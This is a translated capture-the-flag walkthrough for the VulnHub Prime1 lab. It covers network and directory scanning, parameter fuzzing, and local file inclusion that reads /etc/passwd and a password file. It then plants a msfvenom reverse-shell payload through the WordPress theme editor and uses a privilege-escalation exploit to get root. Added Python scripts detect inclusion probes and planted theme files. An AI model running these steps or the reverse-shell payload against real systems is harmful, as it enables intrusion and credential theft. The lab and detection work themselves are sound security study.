kali-vulnhub:prime1

1. After opening the VM in VirtualBox, the following screen appears:

2. The overall approach is as follows:

3. Find the target host's IP

$ nmap -sP 192.168.0.1/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-22 08:50 EST
Nmap scan report for 192.168.0.1
Host is up (0.0039s latency).
Nmap scan report for 192.168.0.101
Host is up (0.063s latency).
Nmap scan report for 192.168.0.104
Host is up (0.000083s latency).
Nmap scan report for 192.168.0.105
Host is up (0.057s latency).
Nmap scan report for 192.168.0.106
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.48 seconds

One extra host, 192.168.0.106, has appeared, so the target's IP is 192.168.0.106.

4. Scan the ports to find which software (services) the host is running

$ nmap -Pn 192.168.0.106
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-22 08:51 EST
Nmap scan report for 192.168.0.106
Host is up (0.000093s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

The host has ports 22 and 80 open; start with the easier one, port 80.

Reference for the mapping between ports and services: “端口与服务对应关系” (weixin_30765475's blog, ITS404)

5. Browse to http://192.168.0.106:80; nothing unusual is found in the page or its source.

6. Start directory scanning with the tool dirb (tutorial: “dirb教程” on hyled-Ava's CSDN blog)

$ dirb http://192.168.0.106
...(many lines omitted)
---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/dev (CODE:200|SIZE:131)
+ http://192.168.0.106/index.php (CODE:200|SIZE:136)
...(many lines omitted)
---- Entering directory: http://192.168.0.106/wordpress/ ----
...(many lines omitted)
(A CMS was found: WordPress)


(Scan again, this time looking for .txt, .php and .zip files; files of these types often contain sensitive information.)
$ dirb http://192.168.0.106 -X .txt,.zip,.php
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 22 09:15:23 2022
URL_BASE: http://192.168.0.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.php,.zip) | (.txt)(.php)(.zip) [NUM = 3]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/image.php (CODE:200|SIZE:147)                                                               
+ http://192.168.0.106/index.php (CODE:200|SIZE:136)                                                               
+ http://192.168.0.106/secret.txt (CODE:200|SIZE:412)                                                              
                                                                                                                   
-----------------
END_TIME: Sat Jan 22 09:15:25 2022
DOWNLOADED: 13836 - FOUND: 3

7. A file named secret.txt was found

$ curl http://192.168.0.106/secret.txt
Looks like you have got some secrets.

Ok I just want to do some help to you. 

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

//see the location.txt and you will get your next move//

The message tells us to brute-force the parameters of every PHP file we found (index.php, image.php), using the method from https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web, and then to view the file “location.txt”.

8. Following the instructions at the linked page, a parameter named “file” can be brute-forced out

$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hw 12 http://192.168.0.106/index.php?FUZZ=1
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.0.106/index.php?FUZZ=1
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"                                             

Total time: 0.514398
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1848.760

9. View http://192.168.0.106/index.php?file=location.txt

$ curl http://192.168.0.106/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

The response hints that another PHP file takes a parameter named “secrettier360”.

10. A local file inclusion vulnerability is likely here, and /etc/passwd is a sensitive file worth trying

View http://192.168.0.106/image.php?secrettier360=/etc/passwd

$ curl http://192.168.0.106/image.php?secrettier360=/etc/passwd

Combine this with the hint on the opening screen, “find password.txt file in my directory”:

11. View http://192.168.0.106/image.php?secrettier360=/home/saket/password.txt

$ curl http://192.168.0.106/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>

A password was found: follow_the_ippsec. That concludes the work on the PHP files.
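As an added defender-side example (not part of the original walkthrough), the following Python script scans Apache-style access-log lines for the kind of file-inclusion probes used in steps 8 to 11; the log lines are constructed here, and the parameter names index.php?file and image.php?secrettier360 are taken from the walkthrough.

```python
"""Detect local-file-inclusion probes in Apache-style access-log lines.
Log format is assumed; the sample lines below are constructed for this example."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines (Apache combined format, trimmed to the fields used).
SAMPLE_LOG = """\
192.168.0.104 - - [22/Jan/2022:09:20:01 -0500] "GET /index.php?file=location.txt HTTP/1.1" 200 206
192.168.0.104 - - [22/Jan/2022:09:21:10 -0500] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2081
192.168.0.104 - - [22/Jan/2022:09:21:40 -0500] "GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1" 200 190
192.168.0.104 - - [22/Jan/2022:09:22:05 -0500] "GET /image.php?secrettier360=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 190
192.168.0.104 - - [22/Jan/2022:09:22:30 -0500] "GET /image.php?secrettier360=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 400
192.168.0.101 - - [22/Jan/2022:09:23:00 -0500] "GET /wordpress/ HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Patterns that mark a value as a file-inclusion attempt rather than a plain file name.
SUSPICIOUS = [
    (re.compile(r'(^|/)\.\.(/|$)'), "directory traversal"),
    (re.compile(r'^/(etc|home|root|proc|var)/'), "absolute system path"),
    (re.compile(r'^[a-z]+://', re.I), "stream wrapper"),
]

def inspect_value(value):
    """Return why a parameter value looks like LFI, or None if it looks benign."""
    decoded = unquote(unquote(value))  # parse_qsl decoded once; also catch double encoding
    for pattern, reason in SUSPICIOUS:
        if pattern.search(decoded):
            return reason
    return None

def find_lfi_attempts(log_text):
    """Return (client ip, parameter, decoded value, reason) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            reason = inspect_value(value)
            if reason:
                hits.append((m.group("ip"), param, unquote(unquote(value)), reason))
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```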

12. Since WordPress was found, and the username and password are now known, visit it and log in to the admin backend.

13. Go to Appearance -> Theme Editor -> secret.php, since this is the only PHP file that can be modified, saved and thereby uploaded. It can be used to make the target open a reverse connection back to our machine, which then gives us access to the target.

Use msfvenom to generate the PHP reverse-connection code (reference: “Msfvenom命令总结大全” on 卿's Blog, CSDN)

$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.104 LPORT=8888 -o shell.php

Copy the contents of the generated PHP file into secret.php and save (upload) it.

14. Start msfconsole and listen on port 8888 (reference: “MSF建立webshell后门,并监听端口建立session连接” on 土拨鼠挖洞中's CSDN blog)

15. Visit secret.php to trigger the reverse connection

http://192.168.0.106/wordpress/wp-content/themes/twentynineteen/secret.php
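Added example, not from the original post: a Python scanner that walks a WordPress themes directory (the path wp-content/themes/twentynineteen is from the walkthrough; the theme tree and the marker list are constructed assumptions) and flags PHP files referencing functions a theme template would not normally use. Disabling the theme editor with define('DISALLOW_FILE_EDIT', true); in wp-config.php removes this upload path altogether.

```python
"""Flag PHP files under a WordPress themes directory that reference functions a
theme template has no reason to call. Tree and marker list are constructed."""
import os
import re
import tempfile

# Names worth a second look in any theme file: eval and base64_decode are common
# in obfuscated payloads, the socket functions in reverse connections.
RISKY_CALLS = ["fsockopen", "stream_socket_client", "shell_exec", "proc_open",
               "passthru", "eval", "base64_decode"]
# Match the bare name, not name followed by "(": payloads often store the name in
# a variable and call through it, which a call-syntax regex would miss.
RISKY_RE = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\b")

def scan_php_file(path):
    """Return the sorted set of risky names referenced in one PHP file."""
    with open(path, "r", errors="replace") as fh:
        return sorted(set(RISKY_RE.findall(fh.read())))

def scan_themes(themes_dir):
    """Walk themes_dir; map relative path -> risky names for each flagged PHP file."""
    findings = {}
    for root, _, files in os.walk(themes_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(root, name)
            names = scan_php_file(full)
            if names:
                findings[os.path.relpath(full, themes_dir)] = names
    return findings

def build_sample_themes():
    """Constructed theme tree: one benign template plus one planted file."""
    base = tempfile.mkdtemp(prefix="themes-")
    theme = os.path.join(base, "twentynineteen")
    os.makedirs(theme)
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php\nfunction tn_setup() { add_theme_support('title-tag'); }\n")
    with open(os.path.join(theme, "secret.php"), "w") as fh:
        # Only the names matter to the scanner; this is not a working payload.
        fh.write("<?php\n$f = 'stream_socket_client';\n"
                 "if (is_callable($f)) { echo 'reachable'; }\n"
                 "$o = base64_decode('');\n")
    return base

if __name__ == "__main__":
    for path, names in scan_themes(build_sample_themes()).items():
        print(path, names)
```

Run it against a real wp-content/themes tree after an incident to list which files deserve manual review; a clean theme should produce no output.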

16. In msfconsole, find the exploit file that elevates an ordinary user to root, and compile it

Use upload to place it in /tmp (every user has access to that directory), add execute permission with chmod, and then run it.

17. Root privileges are obtained; the task is complete.
